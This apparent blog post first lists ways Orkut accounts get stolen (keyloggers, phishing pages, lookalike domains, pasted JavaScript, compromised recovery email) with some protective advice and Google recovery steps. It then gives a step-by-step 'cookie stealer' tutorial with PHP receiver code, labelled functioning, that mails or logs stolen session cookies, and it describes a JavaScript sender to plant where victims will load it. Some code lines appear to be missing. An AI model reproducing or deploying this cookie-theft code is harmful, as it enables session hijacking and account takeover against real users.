How to Hack Orkut ?
It is not an easy task to hack Orkut by breaking this security! But still some people manages to get access to other’s Orkut accounts. The question concerned is How they do it? Many of them just use simple tricks that fool users and then they themself leak out their password. Here are some points you need to take care of, to protect your Orkut account being hacked.
Common Ways to Hack Orkut
1. Using Keyloggers is one of the Easiest Way to Hack an Orkut (or any other email) password. Keylogger programs can spy on what the user types from the keyboard. If you think that you can just uninstall such programs, you are wrong as they are completely hidden.
A keylogger, sometimes called a keystroke logger, key logger, or system monitor, is a hardware device or small program that monitors each keystroke a user types on a specific computer’s keyboard. Keylogger is the easiest way to hack an Orkut account.
A keylogger program is widely available on the internet. Some of the best ones are listed below
A detailed information on Keylogger Hack can be found in my post Hacking an Email Account.
2. Phishing Attack is the most popular way of hacking/stealing other’s password. By using fake login pages it is possible to hack Orkut. Here the users land on a page where they are asked for their login information and they enter their Orkut username and password thinking it to be a real page but actually it is other way round. It submits all the entered details to the creator of the fake login page.
3. Orkut New Features: I have come across a page(fake page) that looks like they are giving the user a choice of selecting new features for orkut with your ID and password, of course!! When the user submit’s his/her Orkut login information through this page, there goes his ID and password mailed to the coder.
4. Community Links: Many times you are provided with a link to a community in a scrap. Read the link carefully, It may be something like http://www.okrut.com/Community.aspx?cmm=22910233 OKRUT not ORKUT. This is definitely a trap created by the hacker to hack your Orkut password. Clicking on this link will take you to a fake login page and there you loose up your password.
5. Java script: You must have seen the circulating scraps that asks you to paste this code in your address bar and see what happens! Well sometimes they also leak out your information. Check the code and if you are unsure of what to do, then I recommend not to use it. So be careful, javascripts can even be used to hack Orkut!
6. Primary mail address: If by some means a hacker came to know the password of your Yahoo mail or Gmail, which users normally keeps as their primary mail address in their Orkut account, then hacker can hack Orkut account by simply using USER ID and clicking on ‘forget password’. This way Google will send link to the already hacked primary email ID to change the password of the Orkut account. Hence the email hacker will change your Orkut account’s password. Hence your, Orkut account is hacked too.
So a better thing would be to keep a very unknown or useless email ID of yours as primary email id so that if the hacker clicks on ‘Forgot password’ the password changing link goes to an unknown email id i.e. not known to the hacker. Hence your Orkut account saved.
So, I hope that this post not only teaches you to hack Orkut but also to hack protect your Orkut account.
If you would like to share something, comment here and I will add up here with a credit to your name.
WHAT TO DO WHEN UR ORKUT IS HACKED!
Here are some options suggested by Google Support when you forget the Gmail password or if someone else takes ownership of your Google Account and changes the password:
Type the email address associated with your Google Account or Gmail user name at google.com/accounts/ForgotPasswd - you will receive an email at your secondary email address with a link to reset your Google Account Password.
This will not work if the other person has changed your secondary email address or if you no longer have access to that address.
2. For Google Accounts Associated with Gmail:
If you have problems while logging into your Gmail account, you can consider contacting Google by filling this form. It however requires you to remember the exact date when you created that Gmail account.
3. For Hijacked Google Accounts Not Linked to Gmail:
If your Google Account doesn’t use a Gmail address, contact Google by filling this form. This approach may help bring back your Google Account if you religiously preserve all your old emails. You will be required to know the exact creation date of your Google Account plus a copy of that original “Google Email Verification” message.
It may be slightly tough to get your Google Account back but definitely not impossible if you have the relevant information in your secondary email mailbox.
How to Make a Cookie Stealer
Introduction
Exactly how does a cookie stealer work, anyway? There are two components in a cookie stealer: the sender and the receiver.
The sender can take many forms. In essense, it's just a link to the receiver with the cookie somehow attached. It can sometimes be difficult to find a way to implement the sender.
The receiver, as the name suggests, is a device which receives the cookie from the sender. It can also take several forms, but the most common is that of a PHP document, most commonly found residing on some obscure webserver.
Step One: The Code
Coding a receiver is the part with which most newbies struggle. Only two things are needed to make a receiver: a webhost which supports PHP, and Notepad (see the end of the text for a link to some free PHP hosts).
As I said in the introduction, the receiver's job is to receive the cookie from the sender. The easiest way to send information to a PHP document is by using the HTTP GET method, which appends information to the end of the URL as a parameter (for example, "page.php?arg1=value"). PHP can access GET information by accessing $HTTP_GET_VARS[x], where x is a string containing the name of the argument.
Once the receiver has the cookie, it needs a way to get that cookie to you. The two most common ways of doing this are sending it in an email, and storing it in a log. We'll look at both.
First, let's look at sending it in an email. Here is what such a beast would look like (functioning code):
$cookie = $HTTP_GET_VARS["cookie"]; // line 2
mail("me@mydomain.com", "Cookie stealer report", $cookie); // line 3
?> // line 4
Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL ("stealer.php?cookie=x") and stores it in the variable $cookie.
Line 3 accesses PHP's mail() function and sends the cookie to "me@mydomain.com" with the subject of "Cookie stealer report".
Line 4 tells the server that the PHP code ends here.
Next, we'll look at my preferred method, which is storing the cookie in a logfile. (functioning code)
$cookie = $HTTP_GET_VARS["cookie"]; // line 2
$file = fopen('cookielog.txt', 'a'); // line 3
fwrite($file, $cookie . "\n\n"); // line 4
?> // line 5
Lines 1 and 2 are the same as before.
Line 3 opens the file "cookielog.txt" for writing, then stores the file's handle in $file.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and "\n\n" combines the two strings as one. The "\n\n" acts as a double line-break, making it easier for us to sift through the log file.
Line 5 is the same as before.
Step Two: Implementing the Stealer
The hardest part (usually) of making a cookie stealer is finding a way to use the sender. The simplest method requires use of HTML and JavaScript, so you have to be sure that your environment supports those two. Here is an example of a sender.
// Line 3
Line 1 tells the browser that the following chunk of code is to be interpereted as JavaScript.
Line 2 adds document.cookie to the end of the URL, which is then stored in document.location. Whenever document.location is changed, the browser is redirected to that URL.
Line 3 tells the browser to stop reading the code as JavaScript (return to HTML).
There are two main ways of implementing the sender:
You can plant your sender where the victim will view it as an HTML document with his browser. In order to do that, you have to find some way to actually post the code somewhere on the site.
No comments:
Post a Comment